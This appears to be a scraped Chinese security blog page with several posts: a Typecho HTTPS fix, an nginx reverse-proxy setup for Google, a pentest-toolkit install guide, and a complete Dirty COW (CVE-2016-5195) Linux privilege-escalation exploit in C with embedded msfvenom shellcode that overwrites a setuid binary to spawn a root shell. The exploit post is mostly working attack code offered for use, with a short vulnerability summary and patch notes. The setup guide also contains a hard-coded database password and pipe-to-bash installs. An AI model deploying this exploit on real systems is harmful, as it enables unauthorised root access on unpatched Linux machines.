Typecho博客全站Https后样式报错解决方法

作者:Secer 发布时间:December 11, 2016 分类:Linux笔记,原创文章

由于博客被墙了,不知道是因为什么原因,又不想换域名,干脆整站上HTTPS吧。
我用的是CDN厂商CloudFlare 提供的免费证书。无需服务器部署直接在CDN后台设置页面规则即可,服务器只需在nginx配置里添加监听443端口:

listen 443

然而……typecho部署https后,出现不能加载http资源的问题

修改源码/var/Typecho/Common.php一个地方即可,加个替换
/**
* 将路径转化为链接
*
* @access public
* @param string $path 路径
* @param string $prefix 前缀
* @return string
*/
public static function url($path, $prefix)
{
$path = (0 === strpos($path, './')) ? substr($path, 2) : $path;
//return str_replace("http:","",rtrim($prefix, '/') . '/' . str_replace('//', '/', ltrim($path, '/'))); //原
return str_replace("http:","",rtrim($prefix, '/') . '/' . str_replace('//', '/', ltrim($path, '/'))); //修改后
}

这样,不论当前环境是http还是https都能很好的继承协议了,不再出现HTTPS由于安全问题不能加载http混合内容的问题。

反代Google

作者:Secer 发布时间:November 1, 2016 分类:Linux笔记

有时候没上代理方便查资料,直接开个谷歌反代服务吧,配置过程如下

安装nginx略

编辑nginx配置文件

vim /usr/local/nginx/conf/nginx.conf
在http部分加入以下内容

proxy_connect_timeout 5;
proxy_read_timeout 60;
proxy_send_timeout 5;
proxy_buffer_size 16k;
proxy_buffers 4 64k;
proxy_busy_buffers_size 128k;
proxy_temp_file_write_size 128k;
proxy_temp_path /tmp/cache/temp;
proxy_cache_path /tmp/cache/path levels=1:2 keys_zone=cache_one:5m inactive=7d max_size=1g;

保存然后编辑虚拟机配置文件

vim /usr/local/nginx/conf/vhost/g.yh.gs.conf
将server段替换为下面的内容

server
{
        listen 80;
        server_name google.cker.in;

        location / {
                proxy_redirect off; #http://www.google.com/ /;

                proxy_set_header HOST 'www.google.com';
                proxy_set_header X-Real-IP $remote_addr;
                proxy_set_header X-Forwarded-For $proxy_add_x_forwarded_for;
                proxy_cookie_domain google.com google.cker.in;
                proxy_pass https://74.125.23.139;
                proxy_set_header Accept-Encoding "";
                proxy_set_header User-Agent $http_user_agent;
                proxy_set_header Accept-Language "en-US";
                proxy_set_header Cookie "PREF=ID=047808f19f6de346:U=0f62f33dd8549d11:FF=2:LD=zh-CN:NW=1:TM=1325338577:LM=1332142444:GM=1:SG=2:S=rE0SyJh2W1IQ-Maw";
                sub_filter www.google.com google.cker.in;
                sub_filter_once off;
                auth_basic    "USER: cker PASS: cker";
                auth_basic_user_file    auth_google.cker.in;

        }
}

 

其中74.125.23.139是指google.com的ip,可以到网上找找,或在国外VPS上解析一下

dig google.com @8.8.8.8

; <<>> DiG 9.8.3-P1 <<>> google.com @8.8.8.8
;; global options: +cmd
;; Got answer:
;; ->>HEADER<<- opcode: QUERY, status: NOERROR, id: 21253
;; flags: qr rd ra; QUERY: 1, ANSWER: 6, AUTHORITY: 0, ADDITIONAL: 0

;; QUESTION SECTION:
;google.com.            IN    A

;; ANSWER SECTION:
google.com.        299    IN    A    74.125.23.139
google.com.        299    IN    A    74.125.23.102
google.com.        299    IN    A    74.125.23.101
google.com.        299    IN    A    74.125.23.100
google.com.        299    IN    A    74.125.23.113
google.com.        299    IN    A    74.125.23.138

生成401认证密文

➜  ~ htpasswd -dmbc auth_google.cker.in cker cker
Adding password for user cker
➜  ~ cat cker             
cker:***********

 

保存后测试下配置文件是否有问题

/usr/local/nginx/sbin/nginx –t

如果出现下面的两句说明配置文件一切正常
nginx: the configuration file /usr/local/nginx/conf/nginx.conf syntax is ok
nginx: configuration file /usr/local/nginx/conf/nginx.conf test is successful

确认没有问题后平滑重启nginx

kill -HUP `cat /usr/local/nginx/logs/nginx.pid`

访问效果

image

image

dirty cow Linux通杀提权EXP

作者:Secer 发布时间:October 26, 2016 分类:Linux笔记

 

CVE-2016-5195 dirty cow

影响范围:2007-2016 Linux kernel >= 2.6.22(2007年发行,到今年10月18日才修复)

测试debian/centos/ubuntu/ x86/x86_64可用,有一定几率失败

 

用法看说明

EXP:

/*
* A PTRACE_POKEDATA variant of CVE-2016-5195
* should work on RHEL 5 & 6
* 
* (un)comment correct payload (x86 or x64)!
* $ gcc -pthread c0w.c  -o c0w
* $ ./c0w
* DirtyCow root privilege escalation
* Backing up /usr/bin/passwd.. to /tmp/bak
* mmap fa65a000
* madvise 0
* ptrace 0
* $ /usr/bin/passwd 
* [[email protected] foo]# whoami 
* root
* [[email protected] foo]# id
* uid=0(root) gid=501(foo) groups=501(foo)
* @KrE80r
*/
#include <fcntl.h>
#include <pthread.h>
#include <string.h>
#include <stdio.h>
#include <stdint.h>
#include <sys/mman.h>
#include <sys/stat.h>
#include <sys/types.h>
#include <sys/wait.h>
#include <sys/ptrace.h>
#include <unistd.h>

int f;
void *map;
pid_t pid;
pthread_t pth;
struct stat st;

// change if no permissions to read
char suid_binary[] = "/usr/bin/passwd";

/*
* $ msfvenom -p linux/x64/exec CMD=/bin/bash PrependSetuid=True -f elf | xxd -i
*/ 
unsigned char shell_code[] = {
  0x7f, 0x45, 0x4c, 0x46, 0x02, 0x01, 0x01, 0x00, 0x00, 0x00, 0x00, 0x00,
  0x00, 0x00, 0x00, 0x00, 0x02, 0x00, 0x3e, 0x00, 0x01, 0x00, 0x00, 0x00,
  0x78, 0x00, 0x40, 0x00, 0x00, 0x00, 0x00, 0x00, 0x40, 0x00, 0x00, 0x00,
  0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
  0x00, 0x00, 0x00, 0x00, 0x40, 0x00, 0x38, 0x00, 0x01, 0x00, 0x00, 0x00,
  0x00, 0x00, 0x00, 0x00, 0x01, 0x00, 0x00, 0x00, 0x07, 0x00, 0x00, 0x00,
  0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x40, 0x00,
  0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x40, 0x00, 0x00, 0x00, 0x00, 0x00,
  0xb1, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0xea, 0x00, 0x00, 0x00,
  0x00, 0x00, 0x00, 0x00, 0x00, 0x10, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
  0x48, 0x31, 0xff, 0x6a, 0x69, 0x58, 0x0f, 0x05, 0x6a, 0x3b, 0x58, 0x99,
  0x48, 0xbb, 0x2f, 0x62, 0x69, 0x6e, 0x2f, 0x73, 0x68, 0x00, 0x53, 0x48,
  0x89, 0xe7, 0x68, 0x2d, 0x63, 0x00, 0x00, 0x48, 0x89, 0xe6, 0x52, 0xe8,
  0x0a, 0x00, 0x00, 0x00, 0x2f, 0x62, 0x69, 0x6e, 0x2f, 0x62, 0x61, 0x73,
  0x68, 0x00, 0x56, 0x57, 0x48, 0x89, 0xe6, 0x0f, 0x05
};
unsigned int sc_len = 177;

/*
* $ msfvenom -p linux/x86/exec CMD=/bin/bash PrependSetuid=True -f elf | xxd -i
unsigned char shell_code[] = {
  0x7f, 0x45, 0x4c, 0x46, 0x01, 0x01, 0x01, 0x00, 0x00, 0x00, 0x00, 0x00,
  0x00, 0x00, 0x00, 0x00, 0x02, 0x00, 0x03, 0x00, 0x01, 0x00, 0x00, 0x00,
  0x54, 0x80, 0x04, 0x08, 0x34, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
  0x00, 0x00, 0x00, 0x00, 0x34, 0x00, 0x20, 0x00, 0x01, 0x00, 0x00, 0x00,
  0x00, 0x00, 0x00, 0x00, 0x01, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
  0x00, 0x80, 0x04, 0x08, 0x00, 0x80, 0x04, 0x08, 0x88, 0x00, 0x00, 0x00,
  0xbc, 0x00, 0x00, 0x00, 0x07, 0x00, 0x00, 0x00, 0x00, 0x10, 0x00, 0x00,
  0x31, 0xdb, 0x6a, 0x17, 0x58, 0xcd, 0x80, 0x6a, 0x0b, 0x58, 0x99, 0x52,
  0x66, 0x68, 0x2d, 0x63, 0x89, 0xe7, 0x68, 0x2f, 0x73, 0x68, 0x00, 0x68,
  0x2f, 0x62, 0x69, 0x6e, 0x89, 0xe3, 0x52, 0xe8, 0x0a, 0x00, 0x00, 0x00,
  0x2f, 0x62, 0x69, 0x6e, 0x2f, 0x62, 0x61, 0x73, 0x68, 0x00, 0x57, 0x53,
  0x89, 0xe1, 0xcd, 0x80
};
unsigned int sc_len = 136;
*/

void *madviseThread(void *arg) {
  int i,c=0;
  for(i=0;i<200000000;i++)
    c+=madvise(map,100,MADV_DONTNEED);
  printf("madvise %d\n\n",c);
}


int main(int argc,char *argv[]){

  printf("                                \n\
   (___)                                   \n\
   (o o)_____/                             \n\
    @@ `     \\                            \n\
     \\ ____, /%s                          \n\
     //    //                              \n\
    ^^    ^^                               \n\
", suid_binary);
  char *backup;
  printf("DirtyCow root privilege escalation\n");
  printf("Backing up %s to /tmp/bak\n", suid_binary);
  asprintf(&backup, "cp %s /tmp/bak", suid_binary);
  system(backup);

  f=open(suid_binary,O_RDONLY);
  fstat(f,&st);
  map=mmap(NULL,st.st_size+sizeof(long),PROT_READ,MAP_PRIVATE,f,0);
  printf("mmap %x\n\n",map);
  pid=fork();
  if(pid){
    waitpid(pid,NULL,0);
    int u,i,o,c=0,l=sc_len;
    for(i=0;i<10000/l;i++)
      for(o=0;o<l;o++)
        for(u=0;u<10000;u++)
          c+=ptrace(PTRACE_POKETEXT,pid,map+o,*((long*)(shell_code+o)));
    printf("ptrace %d\n\n",c);
   }
  else{
    pthread_create(&pth,
                   NULL,
                   madviseThread,
                   NULL);
    ptrace(PTRACE_TRACEME);
    kill(getpid(),SIGSTOP);
    pthread_join(pth,NULL);
    }
  return 0;
}

漏洞概述:

该漏洞具体为,Linux内核的内存子系统在处理写入时复制(copy-on-write, COW)时产生了竞争条件(race condition)。恶意用户可利用此漏洞,来获取高权限,对只读内存映射进行写访问。(A race condition was found in the way the Linux kernel’s memory subsystem handled the copy-on-write (COW) breakage of private read-only memory mappings.)

竞争条件,指的是任务执行顺序异常,可导致应用崩溃,或令攻击者有机可乘,进一步执行其他代码。利用这一漏洞,攻击者可在其目标系统提升权限,甚至可能获得root权限。

根据官方发布的补丁信息,这个问题可以追溯到2007年发布的Linux内核。现在还没有任何证据表明,2007年后是否有黑客利用了这个漏洞。不过安全专家Phil Oester称发现一名攻击者利用该漏洞部署攻击,并向Red Hat通报了最近的攻击事件。

修复方法:

进行Linux内核维护的Greg Kroah-Hartman宣布针对Linux 4.8、4.7和4.4 LTS内核系列的维护更新(更新后为Linux kernel 4.8.3、4.7.9和4.4.26 LTS),修复了该漏洞。目前新版本已经登录各GNU/Linux发行版库,包括Arch Linux(测试中)、Solus和所有受支持版本的Ubuntu。Debian开发人员前天也宣布稳定版Debian GNU/Linux 8 “Jessei”系列内核重要更新——本次更新总共修复4个Linux内核安全漏洞,其中也包括了脏牛。

各操作系统供应商应该即刻下载Linux kernel 4.8.3、Linux kernel 4.7.9和Linux kernel 4.4.26 LTS,为用户提供稳定版渠道更新。

Debian 8.3 Mate搭建渗透测试环境

作者:Secer 发布时间:July 21, 2016 分类:Linux笔记

Debian 8.3 Mate 下载地址
http://cdimage.debian.org/debian-cd/current-live/amd64/iso-hybrid/
http://cdimage.debian.org/debian-cd/8.3.0-live/amd64/iso-hybrid/debian-live-8.3.0-amd64-mate-desktop.iso
http://cdimage.debian.org/debian-cd/current-live/amd64/iso-hybrid/debian-live-8.3.0-amd64-mate-desktop.iso
#Ubuntu Mate ISO http://cdimage.ubuntu.com/ubuntu-mate/releases/15.04/release/ubuntu-mate-15.04-desktop-amd64.iso

 

Debian 安装msf # ruby2.3.1

apt-get install pptp-linux network-manager-pptp build-essential zlib1g zlib1g-dev libxml2 libxml2-dev libxslt-dev locate libreadline6-dev libcurl4-openssl-dev git-core libssl-dev libyaml-dev openssl autoconf libtool ncurses-dev bison curl wget postgresql postgresql-contrib libpq-dev libapr1 libaprutil1 libsvn1 libpcap-dev git-core postgresql curl nmap libsqlite3-dev default-jdk screen subversion –y   #必要组件

ruby用rvm装吧

$ curl -sSL https://rvm.io/mpapis.asc | gpg --import -
$ \curl -sSL https://get.rvm.io | bash -s stable
# 如果上面的连接失败,可以尝试:
$ curl -L https://raw.githubusercontent.com/wayneeseguin/rvm/master/binscripts/rvm-installer | bash -s stable
$ source /etc/profile.d/rvm.sh
rvm install ruby-2.3.1
#rvm install ruby-2.1.8
rvm use 2.3.1 --default
gem install bundler

 

apt-get install rubygems-integration rubygems
gem install wirble sqlite3 bundler
###下面各种报错都是国内网络不稳定造成,直接上vpn解决##
#报错Unable to download data from https://rubygems.org/ - Errno::ECONNRESET: Connection reset by peer - SSL_connect,解决如下

wget https://raw.githubusercontent.com/rubygems/rubygems/master/lib/rubygems/ssl_certs/AddTrustExternalCARoot-2048.pem
gem which rubygems
/usr/lib/ruby/2.1.0/rubygems.rb
cp ~/Downloads/AddTrustExternalCARoot-2048.pem /usr/lib/ruby/2.1.0/rubygems/ssl_certs/
gem install wirble sqlite3 bundler

排错:

#when download from https, may has SSL error, then: gem sources --removehttps://rubygems.org; gem sources --addhttp://rubygems.org or bundle config mirror.https://rubygems.org https://ruby.taobao.org
head -1 /path/to/metasploit-framework/Gemfile
source 'http://rubygems.org'

 

设置Postgresql数据库及用户

sudo -s
su postgres
createuser msf -P -S -R -D
Enter password for new role: ***
Enter it again: ***
createdb -O msf msf
exit

cd /opt/; git clone https://github.com/rapid7/metasploit-framework.git
cd metasploit-framework/
bundle install
bash -c 'for MSF in $(ls msf*); do ln -s /opt/metasploit-framework/$MSF /usr/local/bin/$MSF;done'
nano /opt/metasploit-framework/config/database.yml

production:
adapter: postgresql
database: msf
username: msf
password: msf
host: 127.0.0.1
port: 5432
pool: 75
timeout: 5


sh -c "echo export MSF_DATABASE_CONFIG=/opt/metasploit-framework/config/database.yml >> /etc/profile"
### sh -c "echo export MSF_DATABASE_CONFIG=/opt/metasploit-framework/config/database.yml >> ~/.bashrc"
source /etc/profile
安装中文输入法
apt-get install ibus ibus-googlepinyin ibus-sunpinyin

 

安装Armitage

curl -# -o /tmp/armitage.tgz http://www.fastandeasyhacking.com/download/armitage-latest.tgz
tar -xvzf /tmp/armitage.tgz -C /opt
ln -s /opt/armitage/armitage /usr/local/bin/armitage
ln -s /opt/armitage/teamserver /usr/local/bin/armitage_teamserver
sh -c "echo java -jar /opt/armitage/armitage.jar \$\* > /opt/armitage/armitage"
perl -pi -e 's/armitage.jar/\/opt\/armitage\/armitage.jar/g' /opt/armitage/teamserver

安装CobaltStrike
US代理,获取cobaltstrike

firefox https://www.cobaltstrike.com/download
tar -xvzf /tmp/cobaltstrike.tgz -C /opt
ln -s /opt/cobaltstrike/cobaltstrike /usr/local/bin/cobaltstrike
ln -s /opt/cobaltstrike/teamserver /usr/local/bin/cobaltstrike_teamserver
sh -c "echo java -jar /opt/cobaltstrike/cobaltstrike.jar \$\* > /opt/cobaltstrike/cobaltstrike"
#perl -pi -e 's/cobaltstrike.jar/\/opt\/cobaltstrike\/cobaltstrike.jar/g' /opt/cobaltstrike/teamserver

安装SQLMap

cd /usr/share/; git clone https://github.com/sqlmapproject/sqlmap.git
ln -s /usr/share/sqlmap/sqlmap.py /usr/bin/sqlmap

安装Bettercap

apt-get install build-essential ruby-dev libpcap-dev
gem install bettercap
gem update bettercap

安装 DNSEnum

DNSenum http://dnsenum.googlecode.com/files/dnsenum1.2.tar.gz
git clone https://github.com/fwaeytens/dnsenum.git
cd dnsenum/
安装缺失的模块:cpan XXX::xxx

安装 fierce

$ cd /usr/share
$ svn co https://svn.assembla.com/svn/fierce/fierce2/trunk/ fierce2/
$ cd fierce2/
$ perl Makefile.PL
$ make
$ make test
$ make install
$ ln -s /usr/local/bin/fierce /usr/share/fierce2/fierce
$ mkdir -p /pentest/enumeration/fierce/
$ ln -s /usr/local/bin/fierce /pentest/enumeration/fierce/fierce

cpan Net::DNS #安装缺失的库
cpan Net::DNS::Resolver #貌似可以解决报错 improperly terminated AXFR at D:\tools\fierce-0.9.9\fierce.pl line 228.

安装WPScan

Installing on Debian:
sudo apt-get install git ruby ruby-dev libcurl4-openssl-dev make zlib1g-dev
cd /usr/share/; git clone https://github.com/wpscanteam/wpscan.git
cd wpscan

gem install bundler && bundle install --without test --path vendor/bundle
alias wpscan='ruby /usr/share/wpscan/wpscan.rb --enumerate u --enumerate p --enumerate t --url '

或者安装Docker后安装Docker的wpscan

docker pull wpscanteam/wpscan
docker run --rm wpscanteam/wpscan -u http://yourblog.com [options]

 

安装PPTP VPN支持

apt-get install network-manager-openvpn network-manager-pptp network-manager-pptp-gnome network-manager-vpnc
service network-manager restart

 

 

安装GuardScan

wget https://bootstrap.pypa.io/get-pip.py
python get-pip.py
pip install tornado
#安装个lnmp
apt-get install screen
screen -S lnmp
wget -c http://soft.vpser.net/lnmp/lnmp1.2-full.tar.gz && tar zxf lnmp1.2-full.tar.gz && cd lnmp1.2-full && ./install.sh lnmp
#wget -c http://soft.vpser.net/lnmp/lnmp1.3beta-full.tar.gz && tar zxf lnmp1.3beta-full.tar.gz && cd lnmp1.3beta-full && ./install.sh lnmp

 

mysql

create database pscan;
use pscan;
source pscan.sql
CREATE USER 'pscan'@'%' IDENTIFIED BY 'RFwPauXUhF4sWtSq';GRANT USAGE ON *.* TO 'pscan'@'%' IDENTIFIED BY '***' REQUIRE NONE WITH MAX_QUERIES_PER_HOUR 0 MAX_CONNECTIONS_PER_HOUR 0 MAX_UPDATES_PER_HOUR 0 MAX_USER_CONNECTIONS 0;GRANT ALL PRIVILEGES ON `pscan`.* TO 'pscan'@'%';

修改conn.php中的数据库信息
修改 ./proxy/isqlmap.py
self.webserver="http://localhost:88/"
改成你自己的主机地址和端口。
修改./proxy/task.py
def update():
url="http://localhost:88/api.php?type=sqlmap_update"
urllib2.urlopen(url).read()
def api_get():
url="http://localhost:88/api.php?type=api_get"
data=urllib2.urlopen(url).read()
改成你的host地址


配置
打开 http://localhost:88/config.php 在list里面添加sqlmapapi节点
格式为
http://127.0.0.1:8775 (不需要最后一个/)
浏览器设置代理,并且添加一个http header
User-Hash: youhash


使用
首先运行sqlmapapi,并且在config里面增加至少一个节点
cd proxy/
python proxy_io.py 8080&
python task.py&
然后将浏览器代理设置为
http 127.0.0.1 8080
然后一顿请求之后可以打开
http://localhost:88/config.php

 

仅作记录,呵呵 工具党。